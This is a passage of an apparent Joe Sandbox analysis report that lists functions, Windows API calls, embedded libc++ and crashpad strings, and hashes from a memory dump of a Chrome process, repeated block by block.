                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Value$Alloc
                                                    • String ID:
                                                    • API String ID: 3180153967-0
                                                    • Opcode ID: 76382621da67f0fbaa3f799ca907bd670c18c3067c58736e43a6db38e53d1eeb
                                                    • Instruction ID: 2150e4a357347c14da116bbf2c0b1888f57f519794cd8dcbfd2f854b46fd2a37
                                                    • Opcode Fuzzy Hash: 76382621da67f0fbaa3f799ca907bd670c18c3067c58736e43a6db38e53d1eeb
                                                    • Instruction Fuzzy Hash: A711C8B1A0112C5FD710E768AC85ABA73ACEF44315F084539FA55FB151EB306E0987E2
                                                    APIs
                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00D54200,?,?), ref: 00D542F0
                                                    • GetExitCodeProcess.KERNEL32(00000000,FFFFFFFF), ref: 00D5430E
                                                    • GetCurrentProcess.KERNEL32(?,00D54200,?,?), ref: 00D5433B
                                                    • GetCurrentProcess.KERNEL32 ref: 00D54351
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$CodeExitMultipleObjectsWait
                                                    • String ID:
                                                    • API String ID: 3026435989-0
                                                    • Opcode ID: 397aaedf89cdc4bc5f78ec5bb86f2a58c2aad13664b9f76c77da2db570762983
                                                    • Instruction ID: f1b86cb5cfe526bfb9f0194a3717d5a3e675020a9bbf258bb6d5333057ea991b
                                                    • Opcode Fuzzy Hash: 397aaedf89cdc4bc5f78ec5bb86f2a58c2aad13664b9f76c77da2db570762983
                                                    • Instruction Fuzzy Hash: EE11B6706442089FEB149F69D849AA97BA4EF44315F18412CFC69DB291E770E889C762
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,?,00D99D7B,?,00E04967), ref: 00E7642B
                                                    Strings
                                                    • ..\..\base\synchronization\waitable_event_win.cc, xrefs: 00E7645D
                                                    • gI, xrefs: 00E76492
                                                    • ReportInvalidWaitableEventResult, xrefs: 00E76462
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: ..\..\base\synchronization\waitable_event_win.cc$ReportInvalidWaitableEventResult$gI
                                                    • API String ID: 1452528299-816916075
                                                    • Opcode ID: f63f4e4bce1247e081f4199356f96a7abca92b7201ac5eb51c0c2cb9b3376550
                                                    • Instruction ID: b61e212e0729aa4db02a9d8a4f8f701a7ddd85991ba540bd140f93c20d0cd26e
                                                    • Opcode Fuzzy Hash: f63f4e4bce1247e081f4199356f96a7abca92b7201ac5eb51c0c2cb9b3376550
                                                    • Instruction Fuzzy Hash: 0401A7B18047459BD701EF20AC0644FB7A0EF95318F44092DF88A37242E775A619C7E7
                                                    APIs
                                                    • CloseHandle.KERNEL32(00D485FC,?,00000000,00000000,?,00D485FC,00000000), ref: 00D9BC77
                                                    Strings
                                                    • Free, xrefs: 00D9BC9C
                                                    • CloseHandle, xrefs: 00D9BCB9
                                                    • ..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc, xrefs: 00D9BC97
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc$CloseHandle$Free
                                                    • API String ID: 2962429428-1704384866
                                                    • Opcode ID: 4b052425bbf8b6a61dd0db6f1d8752d59b30e29df5bfb8f8071ae6bb632dea89
                                                    • Instruction ID: 62aa345f244bd4ded118409d5846a0577ab728793a76533905077524f83eb386
                                                    • Opcode Fuzzy Hash: 4b052425bbf8b6a61dd0db6f1d8752d59b30e29df5bfb8f8071ae6bb632dea89
                                                    • Instruction Fuzzy Hash: A7F06271F00258678B047BB6AC1A8BE7768DF85B11B49501DF94A7B282EA74660486F1
                                                    APIs
                                                    • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00E4C366,00000000,00000001,?,?,?,00E3DAE9,?,00000000,00000000), ref: 00E52132
                                                    • GetLastError.KERNEL32(?,00E4C366,00000000,00000001,?,?,?,00E3DAE9,?,00000000,00000000,?,?,?,00E3D42F,?), ref: 00E5213E
                                                      • Part of subcall function 00E52190: CloseHandle.KERNEL32(FFFFFFFE,00E5214E,?,00E4C366,00000000,00000001,?,?,?,00E3DAE9,?,00000000,00000000,?,?), ref: 00E521A0
                                                    • ___initconout.LIBCMT ref: 00E5214E
                                                      • Part of subcall function 00E52170: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00E5210C,00E4C353,?,?,00E3DAE9,?,00000000,00000000,?), ref: 00E52183
                                                    • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00E4C366,00000000,00000001,?,?,?,00E3DAE9,?,00000000,00000000,?), ref: 00E52163
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                    • String ID:
                                                    • API String ID: 2744216297-0
                                                    • Opcode ID: 9e5d20b4ed327a82210ac476a608c6fa0e8f54cbee062638be9737bcd97198ab
                                                    • Instruction ID: 8c3bfbe45eaa3e6d06d624cdbf79ec1508e0f70d753f9264bc6c3176cc9a2292
                                                    • Opcode Fuzzy Hash: 9e5d20b4ed327a82210ac476a608c6fa0e8f54cbee062638be9737bcd97198ab
                                                    • Instruction Fuzzy Hash: 0AF01C36401558BFCF221FE2DD48A8F3F66EB493A1B098528FF09B9120C63299649B91
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(85088B40,ECFE467E,?,?,?,?,00DBEE3A,?), ref: 00DBF540
                                                    • ReleaseSRWLockExclusive.KERNEL32(00000001,00000001,?,00DBEE3A,?), ref: 00DBF5A8
                                                      • Part of subcall function 00DBAE00: ReleaseSRWLockExclusive.KERNEL32(00000001,00000001), ref: 00DBAF04
                                                      • Part of subcall function 00DBAE00: TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBAF67
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: ScopedBlockingCall
                                                    • API String ID: 17069307-1243657212
                                                    • Opcode ID: 72c63b946fe23011ac835beada05703f5fa98cd4fbd0bcba86fc4a616587273c
                                                    • Instruction ID: 75abbb4730f839250014546d7b7598079d660019fb9fdd014ea72dbeafcfd77c
                                                    • Opcode Fuzzy Hash: 72c63b946fe23011ac835beada05703f5fa98cd4fbd0bcba86fc4a616587273c
                                                    • Instruction Fuzzy Hash: D4A10271600201CFDB28CF69C884BB6BBF5FF45314F1885B9E85A8B696D734E855CBA0
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00D38BF9
                                                    • QueryThreadCycleTime.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D38C0C
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string:2502: assertion __n == 0 || __s != nullptr failed: string::assign received nullptr, xrefs: 00D38BC2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Thread$CurrentCycleQueryTime
                                                    • String ID: ..\..\third_party\libc++\src\include\string:2502: assertion __n == 0 || __s != nullptr failed: string::assign received nullptr
                                                    • API String ID: 2290024384-1286669872
                                                    • Opcode ID: 608cfd111b9545e4b3e0768cbd72e51638f7ab36b1428e33904cdfcc6970ecf8
                                                    • Instruction ID: 613f24b53922f8a22bfb9fc44eca258d253e0dff88fe5d08ebae7fe7ba4bdd84
                                                    • Opcode Fuzzy Hash: 608cfd111b9545e4b3e0768cbd72e51638f7ab36b1428e33904cdfcc6970ecf8
                                                    • Instruction Fuzzy Hash: 5571B2B1A007169FCB11CF68C88146FBBF5EF94350F18852EF896A7251EB70A905DBA0
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr, xrefs: 00D3E90E
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D3E915
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr
                                                    • API String ID: 4218353326-1580066018
                                                    • Opcode ID: b07c93ec3eac9fe2d8fa6a59ed4e99e40d17170e95ddddd44f8410f4e59284ca
                                                    • Instruction ID: d0dc6139ba5784a4b6ddfb861ae66d0ed4d0d7cb6b7dae5535d177ccbaed36df
                                                    • Opcode Fuzzy Hash: b07c93ec3eac9fe2d8fa6a59ed4e99e40d17170e95ddddd44f8410f4e59284ca
                                                    • Instruction Fuzzy Hash: EE715F71E002199FCB14DF68E884AAEB7F5FF88304F198169E819AB395D7309D05CFA5
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00E5784A
                                                      • Part of subcall function 00D74B90: GetFileVersionInfoSizeW.VERSION(?,00000000,0.0.0.0-devel,0000000D,Chrome,00000006,?,00E578B9,?), ref: 00D74BF2
                                                      • Part of subcall function 00D74B90: GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,00000006,?,00E578B9,?), ref: 00D74C1B
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00E57A2F
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00E57A36
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: File$InfoVersion$ModuleNameSize
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                    • API String ID: 4070046241-2500828650
                                                    • Opcode ID: f7200ff848bd44ce997f06ab34c86f5101a02510df91d9a0d8857622687bfdf8
                                                    • Instruction ID: 7ba1f98bfc9c75dcd250666dd09371dc89baa49e3a1ef9b41c674bcd57476488
                                                    • Opcode Fuzzy Hash: f7200ff848bd44ce997f06ab34c86f5101a02510df91d9a0d8857622687bfdf8
                                                    • Instruction Fuzzy Hash: EE51E1B1D012296BCF24DF60EC89BDEB7B4AF44305F0485E8E84976101E775AFA8CE90
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF5A90
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF5A9F
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DF5A81
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 2882836952-2888085009
                                                    • Opcode ID: e971853543aac9fcfdd1b58747466db9ec4b16bc8d80769205037b46f2974579
                                                    • Instruction ID: f0b86d7166ddbc3e13a86c7ced949d98a8ab207c70a400e9e71f6207ef61158f
                                                    • Opcode Fuzzy Hash: e971853543aac9fcfdd1b58747466db9ec4b16bc8d80769205037b46f2974579
                                                    • Instruction Fuzzy Hash: D841B4316006199FCB14CF18E8809BAB7B1FF48314B1AC669FE599B355D730EC11CBA0
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00EF44BC,?,00000000,?,00DB7842,?,?,?,?,7FFFFFF7,?), ref: 00D34CFB
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EF44BC,..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap,?,?,?,?,00DB7842,?,?,?,?,7FFFFFF7,?), ref: 00D34D77
                                                      • Part of subcall function 00E282C8: AcquireSRWLockExclusive.KERNEL32(00EF2800,000000C0,?,?,00DBFE69,00F02A10), ref: 00E282D3
                                                      • Part of subcall function 00E282C8: ReleaseSRWLockExclusive.KERNEL32(00EF2800,?,00DBFE69,00F02A10), ref: 00E2830D
                                                      • Part of subcall function 00E28317: AcquireSRWLockExclusive.KERNEL32(00EF2800,?,?,00E57C0E,00EF3538,?,?,00E57B98), ref: 00E28321
                                                      • Part of subcall function 00E28317: ReleaseSRWLockExclusive.KERNEL32(00EF2800,?,00E57C0E,00EF3538,?,?,00E57B98), ref: 00E28354
                                                      • Part of subcall function 00E28317: WakeAllConditionVariable.KERNEL32(00EF27FC,?,00E57C0E,00EF3538,?,?,00E57B98), ref: 00E2835F
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D34DCF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease$ConditionVariableWake
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap
                                                    • API String ID: 4258034872-2510419621
                                                    • Opcode ID: ebedbff881ab21b71dc1d19ae7fe5131735304a383b03079674aed8a7afe7cee
                                                    • Instruction ID: d7a8720f386f41959671ceb0fec7005e0df2472cbf85a9a5063a1a2409b03e66
                                                    • Opcode Fuzzy Hash: ebedbff881ab21b71dc1d19ae7fe5131735304a383b03079674aed8a7afe7cee
                                                    • Instruction Fuzzy Hash: 5741E3B1A002549FCB10DFA4F982BAF77E1EB84314F195129E915BB2C1C739BD08CBA1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ... (message truncated)$[%s : %d] RAW:
                                                    • API String ID: 4218353326-3262997248
                                                    • Opcode ID: 1b3170b34e72ca7281b413a11f27d34933c0ead851827daeae2a80327293b093
                                                    • Instruction ID: cda5b7a7874d284f66d1739a3cfa443ee519a2689038e77bdfb48ca67bdd2210
                                                    • Opcode Fuzzy Hash: 1b3170b34e72ca7281b413a11f27d34933c0ead851827daeae2a80327293b093
                                                    • Instruction Fuzzy Hash: EF31FCB6D01229ABDB109E50EC46EDA7BB9EF94308F0044A9FD09B7181EB315E55CBA0
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00E89AA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: FileModuleName
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\misc\paths_win.cc$GetModuleFileName
                                                    • API String ID: 514040917-708485756
                                                    • Opcode ID: ad596e0d4bd0d0a9fa4a7abd782c97bbc4ffa64e968af4445245907df66f1deb
                                                    • Instruction ID: 3fab9b06fca4a7358735c2c1d204e3bc5dab7fd55930fe5f6b9b64e677d9c245
                                                    • Opcode Fuzzy Hash: ad596e0d4bd0d0a9fa4a7abd782c97bbc4ffa64e968af4445245907df66f1deb
                                                    • Instruction Fuzzy Hash: C721C9B1B4031826DA10BA616C8BFBF379D9B44704F042464FA0D7A2C3DEA45D4896A2
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00F03488), ref: 00D34E14
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D34E8D
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\array:239: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>, xrefs: 00D34EC4
                                                    Memory Dump Source
